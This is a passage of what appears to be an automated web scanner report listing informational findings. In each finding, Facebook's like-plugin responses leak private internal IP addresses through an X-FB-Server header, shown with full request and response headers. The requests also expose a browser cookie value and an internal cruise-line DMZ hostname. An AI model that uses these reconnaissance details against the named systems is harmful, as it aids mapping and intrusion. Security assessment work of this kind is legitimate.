Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.celebritycruises.com%2Fsearch%2FsearchResultsVacationItinerary.do%3Fpackageid%3DML14I021&dest%3DFAR.E&shipCode%3DML&send=false&layout=button_count&width=150&show_faces=false&action=like&colorscheme=light&font=trebuchet+ms&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/search/vacationSearchResults.do?isWidget=false&dest=ANY&sailStartDate=ANY&sailEndDate=ANY&ship=ANY&port=ANY&duration=ANY&includeAdjascentPorts=Y&promoid=&promoType=&promotionTypeId=&priceProgram=&sortBy=4&startRow=0&count=10&cruiseType=CO&cruiseInt=Y&isCrieriaExcluded=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.69.37
X-Cnection: close
Date: Mon, 03 Oct 2011 12:47:24 GMT
Content-Length: 23655

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.19. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.celebritycruises.com%2Fsearch%2FsearchResultsVacationItinerary.do%3Fpackageid%3DCN07A074&dest%3DALCAN&shipCode%3DCN&send=false&layout=button_count&width=150&show_faces=false&action=like&colorscheme=light&font=trebuchet+ms&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/search/vacationSearchResults.do?isWidget=false&dest=ANY&sailStartDate=ANY&sailEndDate=ANY&ship=ANY&port=ANY&duration=ANY&includeAdjascentPorts=Y&promoid=&promoType=&promotionTypeId=&priceProgram=&sortBy=4&startRow=0&count=10&cruiseType=CO&cruiseInt=Y&isCrieriaExcluded=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.180.53
X-Cnection: close
Date: Mon, 03 Oct 2011 12:47:23 GMT
Content-Length: 23657

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.20. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2F%23%21%2Froyalcaribbean&send=false&layout=button_count&width=85&show_faces=false&action=like&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.58
X-Cnection: close
Date: Mon, 03 Oct 2011 12:41:01 GMT
Content-Length: 23340

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.21. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.celebritycruises.com%2Fsearch%2FsearchResultsVacationItinerary.do%3Fpackageid%3DCN09A002&dest%3DALCAN&shipCode%3DCN&send=false&layout=button_count&width=150&show_faces=false&action=like&colorscheme=light&font=trebuchet+ms&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/search/vacationSearchResults.do?isWidget=false&dest=ANY&sailStartDate=ANY&sailEndDate=ANY&ship=ANY&port=ANY&duration=ANY&includeAdjascentPorts=Y&promoid=&promoType=&promotionTypeId=&priceProgram=&sortBy=4&startRow=0&count=10&cruiseType=CO&cruiseInt=Y&isCrieriaExcluded=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.70.31
X-Cnection: close
Date: Mon, 03 Oct 2011 12:47:23 GMT
Content-Length: 23655

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.22. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2F%23%21%2Froyalcaribbean&send=false&layout=button_count&width=85&show_faces=false&action=like&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.4.48
X-Cnection: close
Date: Mon, 03 Oct 2011 12:45:47 GMT
Content-Length: 23302

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.23. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.celebritycruises.com%2Fsearch%2FsearchResultsVacationItinerary.do%3Fpackageid%3DML07A070&dest%3DALCAN&shipCode%3DML&send=false&layout=button_count&width=150&show_faces=false&action=like&colorscheme=light&font=trebuchet+ms&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/search/vacationSearchResults.do?isWidget=false&dest=ANY&sailStartDate=ANY&sailEndDate=ANY&ship=ANY&port=ANY&duration=ANY&includeAdjascentPorts=Y&promoid=&promoType=&promotionTypeId=&priceProgram=&sortBy=4&startRow=0&count=10&cruiseType=CO&cruiseInt=Y&isCrieriaExcluded=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.26.49
X-Cnection: close
Date: Mon, 03 Oct 2011 12:47:23 GMT
Content-Length: 23655

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.24. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fofficialrooms&layout=standard&show_faces=true&width=150&action=like&font=arial&colorscheme=light&height=30 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.rooms.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.123.48
X-Cnection: close
Date: Mon, 03 Oct 2011 12:42:39 GMT
Content-Length: 24428

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.25. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2F%23%21%2Froyalcaribbean&send=false&layout=button_count&width=85&show_faces=false&action=like&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.204.49
X-Cnection: close
Date: Mon, 03 Oct 2011 12:46:32 GMT
Content-Length: 23302

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.26. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2F%23%21%2Froyalcaribbean&send=false&layout=button_count&width=85&show_faces=false&action=like&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.245.57
X-Cnection: close
Date: Mon, 03 Oct 2011 12:52:02 GMT
Content-Length: 23302

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.27. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.celebritycruises.com%2Fsearch%2FsearchResultsVacationItinerary.do%3Fpackageid%3DML07A069&dest%3DALCAN&shipCode%3DML&send=false&layout=button_count&width=150&show_faces=false&action=like&colorscheme=light&font=trebuchet+ms&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/search/vacationSearchResults.do?isWidget=false&dest=ANY&sailStartDate=ANY&sailEndDate=ANY&ship=ANY&port=ANY&duration=ANY&includeAdjascentPorts=Y&promoid=&promoType=&promotionTypeId=&priceProgram=&sortBy=4&startRow=0&count=10&cruiseType=CO&cruiseInt=Y&isCrieriaExcluded=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.37.64
X-Cnection: close
Date: Mon, 03 Oct 2011 12:47:23 GMT
Content-Length: 23655

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.28. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.celebritycruises.com%2Fsearch%2FsearchResultsVacationItinerary.do%3Fpackageid%3DML07A081&dest%3DALCAN&shipCode%3DML&send=false&layout=button_count&width=150&show_faces=false&action=like&colorscheme=light&font=trebuchet+ms&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/search/vacationSearchResults.do?isWidget=false&dest=ANY&sailStartDate=ANY&sailEndDate=ANY&ship=ANY&port=ANY&duration=ANY&includeAdjascentPorts=Y&promoid=&promoType=&promotionTypeId=&priceProgram=&sortBy=4&startRow=0&count=10&cruiseType=CO&cruiseInt=Y&isCrieriaExcluded=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.188.28
X-Cnection: close
Date: Mon, 03 Oct 2011 12:47:23 GMT
Content-Length: 23655

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.29. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.celebritycruises.com%2Fsearch%2FsearchResultsVacationItinerary.do%3Fpackageid%3DML14I022&dest%3DFAR.E&shipCode%3DML&send=false&layout=button_count&width=150&show_faces=false&action=like&colorscheme=light&font=trebuchet+ms&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/search/vacationSearchResults.do?isWidget=false&dest=ANY&sailStartDate=ANY&sailEndDate=ANY&ship=ANY&port=ANY&duration=ANY&includeAdjascentPorts=Y&promoid=&promoType=&promotionTypeId=&priceProgram=&sortBy=4&startRow=0&count=10&cruiseType=CO&cruiseInt=Y&isCrieriaExcluded=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.37.59
X-Cnection: close
Date: Mon, 03 Oct 2011 12:47:24 GMT
Content-Length: 23655

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.30. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.celebritycruises.com%2Fsearch%2FsearchResultsVacationItinerary.do%3Fpackageid%3DIN07A075&dest%3DALCAN&shipCode%3DIN&send=false&layout=button_count&width=150&show_faces=false&action=like&colorscheme=light&font=trebuchet+ms&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/search/vacationSearchResults.do?isWidget=false&dest=ANY&sailStartDate=ANY&sailEndDate=ANY&ship=ANY&port=ANY&duration=ANY&includeAdjascentPorts=Y&promoid=&promoType=&promotionTypeId=&priceProgram=&sortBy=4&startRow=0&count=10&cruiseType=CO&cruiseInt=Y&isCrieriaExcluded=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.198.39
X-Cnection: close
Date: Mon, 03 Oct 2011 12:47:23 GMT
Content-Length: 23655

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.31. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2F%23%21%2Froyalcaribbean&send=false&layout=button_count&width=85&show_faces=false&action=like&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.136.60
X-Cnection: close
Date: Mon, 03 Oct 2011 12:42:06 GMT
Content-Length: 23430

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.32. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.celebritycruises.com%2Fsearch%2FsearchResultsVacationItinerary.do%3Fpackageid%3DML14I020&dest%3DFAR.E&shipCode%3DML&send=false&layout=button_count&width=150&show_faces=false&action=like&colorscheme=light&font=trebuchet+ms&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/search/vacationSearchResults.do?isWidget=false&dest=ANY&sailStartDate=ANY&sailEndDate=ANY&ship=ANY&port=ANY&duration=ANY&includeAdjascentPorts=Y&promoid=&promoType=&promotionTypeId=&priceProgram=&sortBy=4&startRow=0&count=10&cruiseType=CO&cruiseInt=Y&isCrieriaExcluded=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.204.34
X-Cnection: close
Date: Mon, 03 Oct 2011 12:47:24 GMT
Content-Length: 23655

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.33. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2F%23%21%2Froyalcaribbean&send=false&layout=button_count&width=85&show_faces=false&action=like&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
